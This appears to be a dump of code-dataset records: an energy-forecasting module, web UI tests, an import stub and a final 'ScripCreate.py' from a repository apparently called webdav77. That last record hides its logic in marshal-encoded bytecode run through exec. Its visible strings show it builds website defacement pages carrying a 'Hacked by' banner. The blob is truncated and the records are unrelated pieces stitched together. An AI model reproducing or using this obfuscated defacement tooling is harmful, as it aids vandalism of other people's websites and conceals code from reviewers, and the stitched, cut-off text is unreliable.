] | 34
|
2017-11-21T02:52:15.000Z
|
2022-03-27T14:35:25.000Z
|
# Mid_term forecasting for local energy management system
from data_management.database_format import db_mid_term_forecasting,five_minutes_history_data
from configuration.configuration_time_line import default_look_ahead_time_step, default_time
import random
from configuration.configuration_database import local_history_database
from sqlalchemy import create_engine, and_ # Import database
from sqlalchemy.orm import sessionmaker
db_str = local_history_database["db_str"]
engine = create_engine(db_str, echo=False)
Session = sessionmaker(bind=engine)
session_source = Session()
def blank_forecasting_result(*args):
Target_time = args[0]
default_result = db_mid_term_forecasting \
(TIME_STAMP=Target_time,
AC_PD=0,
AC_QD=0,
UAC_PD=0,
UAC_QD=0,
DC_PD=0,
UDC_PD=0,
PV_PG=0,
WP_PG=0,
PRICE=0, )
return default_result
def middle_term_forecasting_pv(*args):
# Short term forecasting for photovoltaic
session = args[0]
Target_Time = args[1]
if session.query(db_mid_term_forecasting).filter(
db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
# The forecasting result dose not exist, a dynamic forecasting will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
PV_PG = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
PV_PG.append(random.random()) # Replace by other data sources
try:
row = session.query(db_mid_term_forecasting).filter_by(TIME_STAMP = Target_Time + i * default_time["Time_step_ed"]).first()
row.PV_PG = PV_PG[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.PV_PG = PV_PG[i]
session.commit()
return PV_PG
def middle_term_forecasting_wp(*args):
# Short term forecasting for wind power
session = args[0]
Target_Time = args[1]
if session.query(db_mid_term_forecasting).filter(
db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
# The forecasting result dose not exist, a dynamic forecasting will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
WP_PG = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
WP_PG.append(random.random())
try:
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.WP_PG = WP_PG[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.WP_PG = WP_PG[i]
session.commit()
return WP_PG
def middle_term_forecasting_load_ac(*args):
# Short term forecasting for critical AC load
session = args[0]
Target_Time = args[1]
if session.query(db_mid_term_forecasting).filter(
db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
# The forecasting result dose not exist, a dynamic forecasting will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
AC_PD = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
AC_PD.append(random.random())
try:
row = session.query(db_mid_term_forecasting).filter_by(TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.AC_PD = AC_PD[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.AC_PD = AC_PD[i]
session.commit()
return AC_PD
def middle_term_forecasting_load_uac(*args):
# Short term forecasting for non-critical AC load
session = args[0]
Target_Time = args[1]
if session.query(db_mid_term_forecasting).filter(
db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
# The forecasting result dose not exist, a dynamic forecasting will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
UAC_PD = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
UAC_PD.append(random.random())
try:
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.UAC_PD = UAC_PD[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.UAC_PD = UAC_PD[i]
session.commit()
return UAC_PD
def middle_term_forecasting_load_dc(*args):
# Short term forecasting for critical DC load
session = args[0]
Target_Time = args[1]
if session.query(db_mid_term_forecasting).filter(
db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
# The forecasting result dose not exist, a dynamic forecasting will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
DC_PD = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
DC_PD.append(random.random())
try:
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.DC_PD = DC_PD[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.DC_PD = DC_PD[i]
session.commit()
return DC_PD
def middle_term_forecasting_load_udc(*args):
# Short term forecasting for non-critical DC load
session = args[0]
Target_Time = args[1]
if session.query(db_mid_term_forecasting).filter(
db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
# The forecasting result dose not exist, a dynamic forecasting will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
UDC_PD = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
UDC_PD.append(random.random())
try:
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.UDC_PD = UDC_PD[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.UDC_PD = UDC_PD[i]
session.commit()
return UDC_PD
def middle_term_forecasting_pv_history(*args):
# Short term forecasting for photovoltaic
session = args[0]
Target_Time = args[1]
if session.query(db_mid_term_forecasting).filter(
db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
# The forecasting result dose not exist, a dynamic forecasting will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
PV_PG = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
row_source = session_source.query(five_minutes_history_data).filter_by(
TIME_STAMP=int((Target_Time - default_time["Base_time"]) / default_time["Time_step_ed"]) + i).first()
PV_PG.append(row_source.PV_PG)
try:
row = session.query(db_mid_term_forecasting).filter_by(TIME_STAMP = Target_Time + i * default_time["Time_step_ed"]).first()
row.PV_PG = PV_PG[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.PV_PG = PV_PG[i]
session.commit()
return PV_PG
def middle_term_forecasting_wp_history(*args):
# Short term forecasting for wind power
session = args[0]
Target_Time = args[1]
if session.query(db_mid_term_forecasting).filter(
db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
# The forecasting result dose not exist, a dynamic forecasting will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
WP_PG = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
row_source = session_source.query(five_minutes_history_data).filter_by(
TIME_STAMP=int((Target_Time - default_time["Base_time"]) / default_time["Time_step_ed"]) + i).first()
WP_PG.append(row_source.WP_PG)
try:
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.WP_PG = WP_PG[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.WP_PG = WP_PG[i]
session.commit()
return WP_PG
def middle_term_forecasting_load_ac_history(*args):
# Short term forecasting for critical AC load
session = args[0]
Target_Time = args[1]
if session.query(db_mid_term_forecasting).filter(
db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
# The forecasting result dose not exist, a dynamic forecasting will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
AC_PD = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
row_source = session_source.query(five_minutes_history_data).filter_by(
TIME_STAMP=int((Target_Time - default_time["Base_time"]) / default_time["Time_step_ed"]) + i).first()
AC_PD.append(row_source.AC_PD)
try:
row = session.query(db_mid_term_forecasting).filter_by(TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.AC_PD = AC_PD[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.AC_PD = AC_PD[i]
session.commit()
return AC_PD
def middle_term_forecasting_load_uac_history(*args):
# Short term forecasting for non-critical AC load
session = args[0]
Target_Time = args[1]
if session.query(db_mid_term_forecasting).filter(
db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
# The forecasting result dose not exist, a dynamic forecasting will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
UAC_PD = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
row_source = session_source.query(five_minutes_history_data).filter_by(
TIME_STAMP=int((Target_Time - default_time["Base_time"]) / default_time["Time_step_ed"]) + i).first()
UAC_PD.append(row_source.NAC_PD)
try:
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.UAC_PD = UAC_PD[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.UAC_PD = UAC_PD[i]
session.commit()
return UAC_PD
def middle_term_forecasting_load_dc_history(*args):
# Short term forecasting for critical DC load
session = args[0]
Target_Time = args[1]
if session.query(db_mid_term_forecasting).filter(
db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
# The forecasting result dose not exist, a dynamic forecasting will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
DC_PD = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
row_source = session_source.query(five_minutes_history_data).filter_by(
TIME_STAMP=int((Target_Time - default_time["Base_time"]) / default_time["Time_step_ed"]) + i).first()
DC_PD.append(row_source.DC_PD)
try:
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.DC_PD = DC_PD[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.DC_PD = DC_PD[i]
session.commit()
return DC_PD
def middle_term_forecasting_load_udc_history(*args):
# Short term forecasting for non-critical DC load
session = args[0]
Target_Time = args[1]
if session.query(db_mid_term_forecasting).filter(
db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
# The forecasting result dose not exist, a dynamic forecasting will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
UDC_PD = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
row_source = session_source.query(five_minutes_history_data).filter_by(
TIME_STAMP=int((Target_Time - default_time["Base_time"]) / default_time["Time_step_ed"]) + i).first()
UDC_PD.append(row_source.NDC_PD)
try:
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.UDC_PD = UDC_PD[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.UDC_PD = UDC_PD[i]
session.commit()
return UDC_PD
| 40.891111
| 135
| 0.663823
| 2,526
| 18,401
| 4.439034
| 0.038005
| 0.073486
| 0.072238
| 0.091501
| 0.93133
| 0.924552
| 0.923303
| 0.922055
| 0.917328
| 0.917328
| 0
| 0.003293
| 0.240856
| 18,401
| 450
| 136
| 40.891111
| 0.799413
| 0.086137
| 0
| 0.854545
| 0
| 0
| 0.082197
| 0.040026
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039394
| false
| 0
| 0.018182
| 0
| 0.09697
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ec10955284f2ee1c865e36223379f28142d44464
| 2,548
|
py
|
Python
|
seldom-web-testing/test_dir/test_006_file_ddt.py
|
SeldomQA/seldom-platform
|
d165d33b586426669c537c89a0ff7d49d44c5b97
|
[
"Apache-2.0"
] | 2
|
2022-02-12T15:02:04.000Z
|
2022-02-26T12:40:03.000Z
|
seldom-web-testing/test_dir/test_006_file_ddt.py
|
SeldomQA/seldom-platform
|
d165d33b586426669c537c89a0ff7d49d44c5b97
|
[
"Apache-2.0"
] | null | null | null |
seldom-web-testing/test_dir/test_006_file_ddt.py
|
SeldomQA/seldom-platform
|
d165d33b586426669c537c89a0ff7d49d44c5b97
|
[
"Apache-2.0"
] | 2
|
2022-02-22T02:45:49.000Z
|
2022-03-18T12:32:32.000Z
|
import seldom
from seldom import file_data
class FileDataTest(seldom.TestCase):
"""
文件数据驱动
"""
def start(self):
self.test_url = "https://www.w3school.com.cn/tiy/t.asp?f=eg_html_form_submit"
@file_data("json_data.json", key="name")
def test_json_list(self, firstname, lastname):
"""
used file_data test
"""
self.open(self.test_url)
self.switch_to_frame(id_="iframeResult")
self.type(name="firstname", text=firstname, clear=True)
self.type(name="lastname", text=lastname, clear=True)
self.sleep(1)
@file_data("json_data.json", key="login")
def test_json_dict(self, username, password):
"""
used file_data test
"""
self.open(self.test_url)
self.switch_to_frame(id_="iframeResult")
self.type(name="firstname", text=username, clear=True)
self.type(name="lastname", text=password, clear=True)
self.sleep(1)
@file_data("yaml_data.yaml", key="name")
def test_yaml_list(self, firstname, lastname):
"""
used file_data test
"""
self.open(self.test_url)
self.switch_to_frame(id_="iframeResult")
self.type(name="firstname", text=firstname, clear=True)
self.type(name="lastname", text=lastname, clear=True)
self.sleep(1)
@file_data("yaml_data.yaml", key="login")
def test_yaml_list(self, username, password):
"""
used file_data test
"""
self.open(self.test_url)
self.switch_to_frame(id_="iframeResult")
self.type(name="firstname", text=username, clear=True)
self.type(name="lastname", text=password, clear=True)
self.sleep(1)
@file_data("csv_data.csv", line=2)
def test_csv(self, firstname, lastname):
"""
used file_data test
"""
self.open(self.test_url)
self.switch_to_frame(id_="iframeResult")
self.type(name="firstname", text=firstname, clear=True)
self.type(name="lastname", text=lastname, clear=True)
self.sleep(1)
@file_data(file="excel_data.xlsx", sheet="Sheet1", line=2)
def test_excel(self, firstname, lastname):
"""
used file_data test
"""
self.open(self.test_url)
self.switch_to_frame(id_="iframeResult")
self.type(name="firstname", text=firstname, clear=True)
self.type(name="lastname", text=lastname, clear=True)
self.sleep(1)
if __name__ == '__main__':
seldom.main(debug=True)
| 31.073171
| 85
| 0.617347
| 327
| 2,548
| 4.611621
| 0.186544
| 0.068966
| 0.095491
| 0.06366
| 0.811671
| 0.79443
| 0.769231
| 0.769231
| 0.769231
| 0.769231
| 0
| 0.005168
| 0.240581
| 2,548
| 81
| 86
| 31.45679
| 0.77416
| 0.049451
| 0
| 0.612245
| 0
| 0
| 0.153439
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0.081633
| 0.040816
| 0
| 0.204082
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
ec1a8d052dd84dfd2dc016d8bbb0064014f1eee5
| 98
|
py
|
Python
|
bolinette/web/defaults/middlewares/__init__.py
|
TheCaptainCat/flasque
|
d42deb57572084f513202a32c460186700ce8e0b
|
[
"MIT"
] | 3
|
2019-10-25T12:21:28.000Z
|
2020-09-11T13:43:32.000Z
|
bolinette/web/defaults/middlewares/__init__.py
|
TheCaptainCat/bolinette
|
d42deb57572084f513202a32c460186700ce8e0b
|
[
"MIT"
] | null | null | null |
bolinette/web/defaults/middlewares/__init__.py
|
TheCaptainCat/bolinette
|
d42deb57572084f513202a32c460186700ce8e0b
|
[
"MIT"
] | null | null | null |
import bolinette.web.defaults.middlewares.auth
import bolinette.web.defaults.middlewares.internal
| 32.666667
| 50
| 0.877551
| 12
| 98
| 7.166667
| 0.583333
| 0.348837
| 0.418605
| 0.604651
| 0.860465
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.040816
| 98
| 2
| 51
| 49
| 0.914894
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
ec2ac68f7f248c2c7d30936057f571389db5f474
| 13,585
|
py
|
Python
|
webdav77-master/data/ScripCreate.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
webdav77-master/data/ScripCreate.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
webdav77-master/data/ScripCreate.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
#Compiled By 404rgr
#Hargai Karya Orang lain :)
#404rgr@gmail.com
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x02\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x02\x00Z\x02\x00d\x03\x00Z\x03\x00d\x04\x00Z\x04\x00d\x05\x00Z\x05\x00d\x06\x00Z\x06\x00d\x07\x00Z\x07\x00He\x07\x00d\x08\x00\x17GHe\x05\x00d\t\x00\x17GHe\x07\x00d\x08\x00\x17GHHe\x03\x00d\n\x00\x17GHe\x08\x00d\x0b\x00\x83\x01\x00Z\t\x00d\x0c\x00GHe\x08\x00d\x0b\x00\x83\x01\x00Z\n\x00d\r\x00GHe\x08\x00d\x0b\x00\x83\x01\x00Z\x0b\x00d\x0e\x00GHe\x08\x00d\x0b\x00\x83\x01\x00Z\x0c\x00d\x0f\x00GHe\x08\x00d\x0b\x00\x83\x01\x00Z\r\x00He\x06\x00d\x10\x00\x17GHe\x08\x00d\x0b\x00\x83\x01\x00Z\x0e\x00e\x0f\x00d\x11\x00e\x0e\x00\x17d\x11\x00\x17d\x12\x00\x83\x02\x00Z\x10\x00d\x13\x00Z\x11\x00e\t\x00Z\x12\x00d\x14\x00Z\x13\x00e\n\x00Z\x14\x00d\x15\x00Z\x15\x00e\x0b\x00Z\x16\x00d\x16\x00Z\x17\x00e\x0c\x00Z\x18\x00d\x17\x00Z\x19\x00e\r\x00Z\x1a\x00d\x18\x00Z\x1b\x00e\x10\x00j\x1c\x00e\x11\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x12\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x13\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x14\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x15\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x16\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x17\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x18\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x19\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x1a\x00\x83\x01\x00\x01e\x10\x00j\x1c\x00e\x1b\x00\x83\x01\x00\x01d\x19\x00GHe\x00\x00j\x1d\x00d\x1a\x00\x83\x01\x00\x01d\x1b\x00GHe\x0e\x00GHe\x00\x00j\x1d\x00d\x1c\x00\x83\x01\x00\x01e\x04\x00d\x1d\x00\x17GHe\x00\x00j\x1d\x00d\x1e\x00\x83\x01\x00\x01d\x1f\x00GHe\x10\x00j\x1e\x00\x83\x00\x00\x01e\x01\x00j\x1f\x00d\x11\x00e\x0e\x00\x17d\x11\x00\x17d \x00\x83\x02\x00\x01e \x00\x83\x00\x00\x01d\x01\x00S(!\x00\x00\x00i\xff\xff\xff\xffNs\x05\x00\x00\x00\x1b[91ms\x05\x00\x00\x00\x1b[92ms\x05\x00\x00\x00\x1b[93ms\x05\x00\x00\x00\x1b[94ms\x05\x00\x00\x00\x1b[36ms\x04\x00\x00\x00\x1b[0ms\x11\x00\x00\x00{<<<<<<[!]>>>>>>}s\x10\x00\x00\x00 Coded By 404rgrs\x0b\x00\x00\x00Judul/Titles\x04\x00\x00\x00==> s\x16\x00\x00\x00Hacked by: (nama/nick)s\x13\x00\x00\x00Masukan Link Gambars-\x00\x00\x00Teks/Pesan (gunakan <br> untuk Ke baris baru)s(\x00\x00\x00Marquee/Teks Berjalan(untuk bagian bawahs\x1c\x00\x00\x00Output {contoh : index.html}t\x00\x00\x00\x00t\x01\x00\x00\x00ws\x13\x00\x00\x00<html><head><title>s\xaf\x0f\x00\x00</title></head><body><br>\n<style type="text/css">body{background:url(https://3.bp.blogspot.com/-5Ma3lIrkPCk/W5p-c6bBmsI/AAAAAAAAALw/Gh-OIZLSiJc3QRCyShSytMNAtpUQoSSXQCLcBGAs/s320/Gambar%2BAnimasi%2BPetir%2BBergerak%2BWallpaper%2BKilat%2BMerah%2BLuar%2BBiasa.gif) repeat center center fixed black;}</style>\n<link href=\'http://fonts.googleapis.com/css?family=Orbitron:700\' rel=\'stylesheet\' type=\'text/css\'>\n<link href=\'http://fonts.googleapis.com/css?family=Anton\' rel=\'stylesheet\' type=\'text/css\'>\n<link href=\'http://fonts.googleapis.com/css?family=Josefin Sans\' rel=\'stylesheet\' type=\'text/css\'>\n<body bgcolor="#000000" background =><div class=\'CenterDiv\'><center><SCRIPT>\n\nfarbbibliothek = new Array(); \nfarbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100"); \nfarbbibliothek[1] = new Array("#00FF00","#000000","#00FF00","#00FF00"); \nfarbbibliothek[2] = new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00"); \nfarbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040"); \nfarbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000"); \nfarbbibliothek[5] = new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF"); \nfarbbibliothek[6] = new Array("#33CCFF","#33CCCC","#33CC99","#33CC66","#33CC33","#33CC00"); \nfarbbibliothek[7] = new Array("#00dbdb","#00afdb","#0083db","#0058db","#002cdb","#2c00db","#5800db","#8300db","#af00db","#db00db"); \nfarbbibliothek[8] = new Array("#ffd8f4","#ffcff2","#ffc6f0","#ffbded","#ffb4eb","#ffabe8","#ffa2e6","#ff99e3","#ff90e1","#ff87de","#ff7edc","#ff75d9","#ff6cd7","#ff63d5","#ff5ad3","#ff51d1","#ff48cf","#ff3fcd","#ff36cb","#ff2dc9","#ff24c7","#ff1bc5","#ff12c3","#ff09c1","#f600b8","#ed00b1","#e400aa","#db00a3","#d2009c","#c90095","#c0008e","#b70087","#ae0080","#a50079","#9c0072","#93006b","#8a0064","#81005d","#780056","#6f004f","#660048","#5d0042","#54003b","#4b0035","#42002f","#390028","#300022","#27001b"); \nfarben = farbbibliothek[4];\nfunction farbschrift() \n{ \nfor(var i=0 ; i<Buchstabe.length; i++) \n{ \ndocument.all["a"+i].style.color=farben[i]; \n} \nfarbverlauf(); \n} \nfunction string2array(text) \n{ \nBuchstabe = new Array(); \nwhile(farben.length<text.length) \n{ \nfarben = farben.concat(farben); \n} \nk=0; \nwhile(k<=text.length) \n{ \nBuchstabe[k] = text.charAt(k); \nk++; \n} \n} \nfunction divserzeugen() \n{ \nfor(var i=0 ; i<Buchstabe.length; i++) \n{ \ndocument.write("<b><font face=\'jolly lodger\' size=\'40\' color=\'hotpink\'></a><span id=\'a"+i+"\' class=\'a"+i+"\'>"+Buchstabe[i] + "</span></font></b>"); \n} \nfarbschrift(); \n} \nvar a=1; \nfunction farbverlauf() \n{ \nfor(var i=0 ; i<farben.length; i++) \n{ \nfarben[i-1]=farben[i]; \n} \nfarben[farben.length-1]=farben[-1]; \n \nsetTimeout("farbschrift()",30); \n} \nvar farbsatz=1; \nfunction farbtauscher() \n{ \nfarben = farbbibliothek[farbsatz]; \nwhile(farben.length<text.length) \n{ \nfarben = farben.concat(farben); \n} \nfarbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001)); \n} \nsetInterval("farbtauscher()",5000); \ntext= \'<[ hacked by s\x8e\x00\x00\x00]>\';\n</script><span class=\'newclass\'>\n<script type="text/javascript">\nstring2array(text); \ndivserzeugen();\n</script></span>\n\n<center><img src=sG\x0e\x00\x00 width=450px height=340px>\n<body onload="init()"></body>\n<script type="text/javascript">\n// Hacked By : CopyRight404rgr\nTypingText = function(element, interval, cursor, finishedCallback) {\nif((typeof document.getElementById == "undefined") || (typeof\n\nelement.innerHTML == "undefined")) {\nthis.running = true;\nreturn;\n}\nthis.element = element;\nthis.finishedCallback = (finishedCallback ? finishedCallback : function() {\n\nreturn; });\nthis.interval = (typeof interval == "undefined" ? 100 : interval);\nthis.origText = this.element.innerHTML;\nthis.unparsedOrigText = this.origText;\nthis.cursor = (cursor ? cursor : "");\nthis.currentText = "";\nthis.currentChar = 0;\nthis.element.typingText = this;\nif(this.element.id == "") this.element.id = "typingtext" 